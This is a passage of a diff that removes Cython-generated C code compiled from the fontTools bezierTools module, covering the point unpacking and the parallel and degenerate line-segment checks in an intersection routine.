PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_s2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1172, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1172, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1172, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_s2x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_s2y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1173 - * e1x, e1y = e1 - * s2x, s2y = s2 - * e2x, e2y = e2 # <<<<<<<<<<<<<< - * if ( - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - */ - if ((likely(PyTuple_CheckExact(__pyx_v_e2))) || (PyList_CheckExact(__pyx_v_e2))) { - PyObject* sequence = __pyx_v_e2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1173, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_e2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1173, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L9_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 1173, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L10_unpacking_done; - __pyx_L9_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1173, __pyx_L1_error) - __pyx_L10_unpacking_done:; - } - __pyx_v_e2x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_e2y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1175 - * e2x, e2y = e2 - * if ( - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) # <<<<<<<<<<<<<< - * ): # Parallel vertical - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L12_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1x, __pyx_v_e1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L12_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1x, __pyx_v_s2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = (!__pyx_t_7); - __pyx_t_5 = __pyx_t_8; - __pyx_L12_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1174 - * s2x, s2y = s2 - * e2x, e2y = e2 - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1177 - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - * return [] # <<<<<<<<<<<<<< - * if ( - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1177, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1174 - * s2x, s2y = s2 - * e2x, e2y = e2 - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - */ - } - - /* "fontTools/misc/bezierTools.py":1179 - * return [] - * if ( - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) # <<<<<<<<<<<<<< - * ): # Parallel horizontal - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s2y, __pyx_v_e2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_8) { - } else { - __pyx_t_5 = __pyx_t_8; - goto __pyx_L16_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1y, __pyx_v_e1y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_8) { - } else { - __pyx_t_5 = __pyx_t_8; - goto __pyx_L16_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1y, __pyx_v_s2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = (!__pyx_t_8); - __pyx_t_5 = __pyx_t_7; - __pyx_L16_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1178 - * ): # Parallel vertical - * return [] - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1181 - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - * return [] # <<<<<<<<<<<<<< - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1181, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1178 - * ): # Parallel vertical - * return [] - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - */ - } - - /* "fontTools/misc/bezierTools.py":1182 - * ): # Parallel horizontal - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L20_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s2y, __pyx_v_e2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L20_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1183 - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] # <<<<<<<<<<<<<< - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1182 - * ): # Parallel horizontal - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - */ - } - - /* "fontTools/misc/bezierTools.py":1184 - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(e1x, s1x): - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1x, __pyx_v_e1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L23_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1y, __pyx_v_e1y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L23_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1185 - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] # <<<<<<<<<<<<<< - * if math.isclose(e1x, s1x): - * x = s1x - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1185, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1184 - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(e1x, s1x): - */ - } - - /* "fontTools/misc/bezierTools.py":1186 - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - * if math.isclose(e1x, s1x): # <<<<<<<<<<<<<< - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject 